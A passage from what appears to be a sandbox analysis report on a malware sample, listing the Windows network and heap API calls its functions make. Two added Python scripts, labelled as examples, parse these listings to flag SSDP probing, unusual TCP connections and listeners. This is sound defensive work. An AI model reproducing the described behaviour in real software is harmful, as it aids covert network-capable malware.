                                                                     • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: Twizt$Twizt
                                                                    • API String ID: 1659193697-16428492
                                                                    • Opcode ID: 28cc8b85fbb863a96b5461235214a5ab15b9d829432cc0cf808d74acbef9bc59
                                                                    • Instruction ID: a71c0bccabe8f3fb080a23dd90b4eb14de59e01fcd2b7b8bcad4b0800539831b
                                                                    • Opcode Fuzzy Hash: 28cc8b85fbb863a96b5461235214a5ab15b9d829432cc0cf808d74acbef9bc59
                                                                    • Instruction Fuzzy Hash: 181124B5900108BFCB04DF98D841E9EB7B5EF48308F14C1A9FD19AB342D635EA10CBA5
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 0040CDD3
                                                                    • htons.WS2_32(00009E34), ref: 0040CE05
                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040CE1F
                                                                      • Part of subcall function 0040AB40: shutdown.WS2_32(0040AB2D,00000002), ref: 0040AB49
                                                                      • Part of subcall function 0040AB40: closesocket.WS2_32(0040AB2D), ref: 0040AB53
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: closesocketconnecthtonsshutdownsocket
                                                                    • String ID:
                                                                    • API String ID: 1987800339-0
                                                                    • Opcode ID: cbdb9185097dfb3a9a33e6ecced3d904d4b18b7e3af7f03057a5aabe6a457024
                                                                    • Instruction ID: 10e4ce005d5f4377fb43720ce7fadd865a0fdbaf8ef4bbe44a4c7335c1314f5f
                                                                    • Opcode Fuzzy Hash: cbdb9185097dfb3a9a33e6ecced3d904d4b18b7e3af7f03057a5aabe6a457024
                                                                    • Instruction Fuzzy Hash: 71113974D05209EBCB10DFA8DA496AEB670AF08320F2043A9E529A73D0D7745F01979A
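The sub-calls of 0040D710 listed earlier on this page open a UDP socket, set SO_BROADCAST on it (level 0xFFFF is SOL_SOCKET, option 0x20 is SO_BROADCAST), bind it, sendto() the address 239.255.255.250 on port 0x76C (1900) and then switch it to non-blocking mode with ioctlsocket FIONBIO (0x8004667E). That address and port are the SSDP multicast group that UPnP devices listen on, so the sequence is an SSDP discovery probe. The function at 0040CDD3 directly above opens a TCP socket and connect()s to port 0x9E34 (40500), outside the well-known range. As an added example that is not part of the Joe Sandbox report or of the sample's own code, the following Python parses "APIs" listing lines in this format, groups them into per-socket flows and flags both patterns. The accepted line format, the constructed trace that joins the two functions' lines, and the set of "common" TCP ports are this example's assumptions; API calls the helper does not model (ioctlsocket among them) are parsed but ignored.

```python
import ipaddress
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the Winsock lines of the 0040D710 sub-calls and of the
# function at 0040CDD3, copied from the report's listing into one trace.
SAMPLE_TRACE = """\
• Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
• Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
• Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
• Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
• Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
• Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
• Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
• socket.WS2_32(00000002,00000001,00000006), ref: 0040CDD3
• htons.WS2_32(00009E34), ref: 0040CE05
• connect.WS2_32(000000FF,?,00000010), ref: 0040CE1F
"""

# One listing line: optional "Part of subcall function X:", api.module(args), ref
LINE_RE = re.compile(
    r"(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.\w+(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# Winsock constants, written as the hex values the sandbox prints
SOCK_STREAM, SOCK_DGRAM, IPPROTO_TCP, IPPROTO_UDP = 1, 2, 6, 17
SOL_SOCKET, SO_BROADCAST, SSDP_PORT = 0xFFFF, 0x0020, 1900
COMMON_TCP_PORTS = {21, 22, 25, 80, 110, 143, 443, 465, 587, 993, 995, 8080}  # assumption

@dataclass
class Call:
    api: str
    args: List[str]
    ref: str

@dataclass
class Flow:
    start_ref: str
    sock_type: Optional[int] = None
    proto: Optional[int] = None
    port: Optional[int] = None        # host-order value handed to htons()
    dest: Optional[str] = None        # literal handed to inet_addr()
    broadcast: bool = False           # setsockopt(SOL_SOCKET, SO_BROADCAST) seen
    endpoint_apis: List[str] = field(default_factory=list)

def _hex(arg: str) -> Optional[int]:
    """Hex argument as printed; '?' (value unknown to the sandbox) becomes None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None

def parse_trace(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            calls.append(Call(m["api"].lower(), args, m["ref"]))
    return calls

def build_flows(calls: List[Call]) -> List[Flow]:
    """Each socket() opens a flow; the calls after it describe that socket until
    the next socket(). Calls this helper does not model are ignored."""
    flows, cur = [], None
    for c in calls:
        if c.api == "socket":
            cur = Flow(c.ref, *(_hex(a) for a in c.args[1:3]))  # (type, protocol)
            flows.append(cur)
        elif cur is None:
            continue
        elif c.api == "htons" and c.args:
            cur.port = _hex(c.args[0])
        elif c.api == "inet_addr" and c.args:
            cur.dest = c.args[0]
        elif c.api == "setsockopt" and len(c.args) >= 3:
            if (_hex(c.args[1]), _hex(c.args[2])) == (SOL_SOCKET, SO_BROADCAST):
                cur.broadcast = True
        elif c.api in ("bind", "connect", "sendto"):
            cur.endpoint_apis.append(c.api)
    return flows

def classify(flows: List[Flow]):
    """Label SSDP multicast discovery and TCP connects to unusual ports."""
    findings = []
    for f in flows:
        udp = f.sock_type == SOCK_DGRAM or f.proto == IPPROTO_UDP
        tcp = f.sock_type == SOCK_STREAM or f.proto == IPPROTO_TCP
        try:
            multicast = f.dest is not None and ipaddress.ip_address(f.dest).is_multicast
        except ValueError:
            multicast = False
        if udp and f.port == SSDP_PORT and multicast and "sendto" in f.endpoint_apis:
            findings.append(("ssdp_multicast_discovery", f))
        elif tcp and "connect" in f.endpoint_apis and f.port is not None and f.port not in COMMON_TCP_PORTS:
            findings.append(("tcp_connect_nonstandard_port", f))
    return findings

def analyze(text: str):
    return classify(build_flows(parse_trace(text)))
```

Running `analyze(SAMPLE_TRACE)` yields one `ssdp_multicast_discovery` flow (destination 239.255.255.250, port 1900, SO_BROADCAST set) and one `tcp_connect_nonstandard_port` flow (port 40500). The grouping is deliberately linear, one socket() at a time, because a per-function listing like this one does not carry the socket handle values (the sandbox prints 000000FF for them), so the order of calls is the only thing tying them to a socket.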
                                                                    APIs
                                                                      • Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00409DC7,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E9C
                                                                    • HeapSetInformation.KERNEL32(020D0000,00000000,00000002,00000004), ref: 00409EC6
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00409ECC
                                                                      • Part of subcall function 00409EE0: GetProcessHeaps.KERNEL32(000000FF,?), ref: 00409EFC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                    • String ID:
                                                                    • API String ID: 3179415709-0
                                                                    • Opcode ID: f2378abd389c528855b2215640a50ba70f6bde38e81fbf66e01ddb41fd263172
                                                                    • Instruction ID: d15e15a0956cd53a3f7420caceedbd75f27766a05eec27fee61015ba2f128238
                                                                    • Opcode Fuzzy Hash: f2378abd389c528855b2215640a50ba70f6bde38e81fbf66e01ddb41fd263172
                                                                    • Instruction Fuzzy Hash: D1F0B4B0581304ABD724DB71FC05BA637A8A704705F02803EF6089A2D2EAB9DC44CB9C
                                                                    APIs
                                                                      • Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
                                                                    • RtlAllocateHeap.NTDLL(020D0000,?,-0000000C), ref: 00409DFA
                                                                    • memset.NTDLL ref: 00409E34
                                                                      • Part of subcall function 00409E70: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00409DC7,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E9C
                                                                      • Part of subcall function 00409E70: HeapSetInformation.KERNEL32(020D0000,00000000,00000002,00000004), ref: 00409EC6
                                                                      • Part of subcall function 00409E70: GetCurrentProcessId.KERNEL32 ref: 00409ECC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                    • String ID:
                                                                    • API String ID: 3494217179-0
                                                                    • Opcode ID: d8037d4416afb632a3dc4f98f72e54e87fb15f54c14e696db28e718d2a8b7ec8
                                                                    • Instruction ID: bc348cf5c9b079020b3d900c37522172a8fbba108f4db171397f18f444666f8c
                                                                    • Opcode Fuzzy Hash: d8037d4416afb632a3dc4f98f72e54e87fb15f54c14e696db28e718d2a8b7ec8
                                                                    • Instruction Fuzzy Hash: A611FEB5900108BBCB10EFA5D845B9E7BB5AF44305F14C169F909BB382D638DE54CB99
                                                                    APIs
                                                                      • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                      • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                      • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
                                                                      • Part of subcall function 0040B200: EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
                                                                      • Part of subcall function 0040B200: LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C
                                                                    • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040D57D
                                                                    • WaitForSingleObject.KERNEL32(00000610,00001388), ref: 0040D5C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                    • String ID:
                                                                    • API String ID: 3920643007-0
                                                                    • Opcode ID: a86012ae710333058172dcdbedf12253eac4732d168f1a6e5cd698471d501b85
                                                                    • Instruction ID: ebe6697be7004dc57312df383308c6bc29ac17b58d9e4cbca4aa496e4513f42a
                                                                    • Opcode Fuzzy Hash: a86012ae710333058172dcdbedf12253eac4732d168f1a6e5cd698471d501b85
                                                                    • Instruction Fuzzy Hash: 1F11A575E00208BBE704EBE4DC4ABAF7734AB04704F148179F901772D1E6B5AA44CB89
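The function entries in this section list each resolved API call with its module, the argument values seen on the stack, and the call-site address, and mark calls made inside a subcall. The entry directly above is the one behind the "open a port and listen" signature: socket(2, 2, 0x11) is AF_INET / SOCK_DGRAM / IPPROTO_UDP followed by bind, and WaitForSingleObject(..., 0x1388) is a 5000 ms timed wait. The following script is an added example, not part of the Joe Sandbox report or its IDA plugin; it parses these annotation lines into structured call records and derives a few triage tags. The sample block is copied from the entries on this page, the regular expression is shaped only to the line format visible here, and the tag names and the grouping rules behind them are this example's own choices.

```python
"""Parse Joe Sandbox per-function "APIs" annotations into call records and tags.
Added example for this report; the regex matches the line shape shown on the
page, the tag names and rules are assumptions of this example, not the tool's."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed input: three "APIs" blocks copied from the report; a blank line
# separates one function's block from the next.
SAMPLE = """\
• Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
• Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
• Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
• Part of subcall function 0040B200: EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
• InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040D57D
• WaitForSingleObject.KERNEL32(00000610,00001388), ref: 0040D5C7

• Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
• RtlAllocateHeap.NTDLL(020D0000,?,-0000000C), ref: 00409DFA
• memset.NTDLL ref: 00409E34
• Part of subcall function 00409E70: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00409DC7,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E9C

• gethostname.WS2_32(?,00000100), ref: 0040ADEC
• gethostbyname.WS2_32(?), ref: 0040ADFE
"""

# One annotation line: optional "Part of subcall function <addr>:" prefix,
# "<api>.<module>", an optional "(args)" list, then ", ref: <call-site>".
LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]   # int for a value the tool saw, None for '?'
    ref: int                    # address of the call instruction
    callee: Optional[int]       # address of the subcall the API is invoked from, if any

def parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)   # int() accepts a leading '-'

def parse_block(text: str) -> List[Call]:
    """Parse one function's APIs block; lines that are not API entries are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        raw = m["args"]
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16),
                          int(m["callee"], 16) if m["callee"] else None))
    return calls

def parse_report(text: str) -> List[List[Call]]:
    """Split the text into per-function blocks on blank lines."""
    return [parse_block(b) for b in re.split(r"\n\s*\n", text.strip()) if b.strip()]

# Winsock constants (documented values) used to decode socket() arguments.
AF_INET, SOCK_STREAM, SOCK_DGRAM, IPPROTO_TCP, IPPROTO_UDP = 2, 1, 2, 6, 17
INFINITE = 0xFFFFFFFF

def tag_function(calls: List[Call]) -> Set[str]:
    """Derive triage tags for one function (tag names are this example's own)."""
    names = {c.api for c in calls}
    tags: Set[str] = set()
    for c in calls:
        if c.api == "socket" and len(c.args) == 3:
            fam, typ, proto = c.args
            if fam == AF_INET and typ == SOCK_DGRAM and proto in (0, IPPROTO_UDP):
                tags.add("udp_socket")
            if fam == AF_INET and typ == SOCK_STREAM and proto in (0, IPPROTO_TCP):
                tags.add("tcp_socket")
        if c.api == "WaitForSingleObject" and len(c.args) == 2 and c.args[1] not in (None, INFINITE):
            tags.add(f"timed_wait_{c.args[1]}ms")
    if "bind" in names and tags & {"udp_socket", "tcp_socket"}:
        tags.add("listener")                 # socket() + bind(): an inbound endpoint
    if {"HeapCreate", "RtlAllocateHeap"} <= names:
        tags.add("private_heap_allocator")   # allocator built on a private heap
    if {"gethostname", "gethostbyname"} <= names:
        tags.add("local_host_enumeration")
    return tags

if __name__ == "__main__":
    for i, calls in enumerate(parse_report(SAMPLE)):
        print(f"function block {i}: {sorted(tag_function(calls))}")
        for c in calls:
            where = f" (via sub_{c.callee:08X})" if c.callee else ""
            print(f"  {c.ref:08X}  {c.api}.{c.module}{where} {c.args}")
```

Blocks whose arguments are all '?' still parse (the values become None), so the tags fall back to API names alone; a function that only calls bind on a socket the tool could not resolve is tagged a listener only if the socket() arguments were seen, which keeps the UDP/TCP distinction honest.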
                                                                    APIs
                                                                    • gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                    • gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: gethostbynamegethostname
                                                                    • String ID:
                                                                    • API String ID: 3961807697-0
                                                                    • Opcode ID: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                    • Instruction ID: 4c25e3467811ff68b39612d5822c2a685709a2e0bc46d2761966ab013cae1a79
                                                                    • Opcode Fuzzy Hash: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                    • Instruction Fuzzy Hash: 4E1112349442288BCB24CF24C848BD9B771AB65314F1886D6D4C9673D0C7F96DD5CF86
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: gethostbynameinet_addr
                                                                    • String ID:
                                                                    • API String ID: 1594361348-0
                                                                    • Opcode ID: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                    • Instruction ID: cb50bac6aa0e7e12dc0343020e8a378ceee1aa6c6dd57b9abb221f5468a140c1
                                                                    • Opcode Fuzzy Hash: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                    • Instruction Fuzzy Hash: D9F0A274900208EFCB14DFE4D54899EBBB4EB49311F1083A6D905573A0D7749E90DF45
                                                                    APIs
                                                                    • shutdown.WS2_32(0040AB2D,00000002), ref: 0040AB49
                                                                    • closesocket.WS2_32(0040AB2D), ref: 0040AB53
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: closesocketshutdown
                                                                    • String ID:
                                                                    • API String ID: 572888783-0
                                                                    • Opcode ID: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                    • Instruction ID: e588004495cc6a7b8ebd8d82ef2c96d96882889d66b7c68133776882e6b5d849
                                                                    • Opcode Fuzzy Hash: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                    • Instruction Fuzzy Hash: 39C04C7914020CBBCB549FE5EC4DDD97BACFB48751F108455FA098B251CAB6E9808B94
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49918b4f20286d22e57c7ceed385b398b81563bf0e8e17b5f3ec0db91efd0369
                                                                    • Instruction ID: 8fd51ed7c7d124206d95d0b099151232a703b398231c835f2f34ac4665f76d2c
                                                                    • Opcode Fuzzy Hash: 49918b4f20286d22e57c7ceed385b398b81563bf0e8e17b5f3ec0db91efd0369
                                                                    • Instruction Fuzzy Hash: B081EA75900118EFDB25CF18C895BAA77B1FB44358F1085A9E94DAB382D734AEC5CF84
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
                                                                    • LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: 839316003de6d4969e72e9a64bdcbbbec430ca9f73e83315ba2c9423ae0d711a
                                                                    • Instruction ID: 4173032fab3eb0730c98540359f75f4152e7c09aa21c3b13d5d70a64086a5cd8
                                                                    • Opcode Fuzzy Hash: 839316003de6d4969e72e9a64bdcbbbec430ca9f73e83315ba2c9423ae0d711a
                                                                    • Instruction Fuzzy Hash: F4E01AB4941208EFCB14DF84FC09BD97B68E704305F12806DE90853390D7B5AE90DA9D
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00416690,?,0040B3F7), ref: 0040AB68
                                                                    • LeaveCriticalSection.KERNEL32(00416690,?,0040B3F7), ref: 0040AB78
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: 81c3f962b9ec76ce2805c60adb74695caac985be6cbd1f024fba086166782042
                                                                    • Instruction ID: 927706f0d4a3faa36ccdeaf6698e9d1267a6522d247c521c6b95ccff81df7cb1
                                                                    • Opcode Fuzzy Hash: 81c3f962b9ec76ce2805c60adb74695caac985be6cbd1f024fba086166782042
                                                                    • Instruction Fuzzy Hash: 09B09B341C03059B81103F95BC0BBCC3F1895047653128036FD0954051DDE5B4D4D95F
                                                                    APIs
                                                                      • Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
                                                                    • RtlFreeHeap.NTDLL(020D0000,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentFreeHeapProcess
                                                                    • String ID:
                                                                    • API String ID: 3855406826-0
                                                                    • Opcode ID: 5c77f0e4d4085861ac8a8ab167670b2290c4d540b64ade23244c922168c35f16
                                                                    • Instruction ID: 3faa604e5be9d5a0263373ae2e3f7e010bf72a20a2b1d8f85abd2c6c7d5d41cb
                                                                    • Opcode Fuzzy Hash: 5c77f0e4d4085861ac8a8ab167670b2290c4d540b64ade23244c922168c35f16
                                                                    • Instruction Fuzzy Hash: 11F06874900308AFDB04DFD5D8449ADBB75AF94304F10C1AEEA086B381FA36DD51CB95
                                                                    APIs
                                                                    • send.WS2_32(00000000,00000000,?,00000000), ref: 0040CCAF
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: send
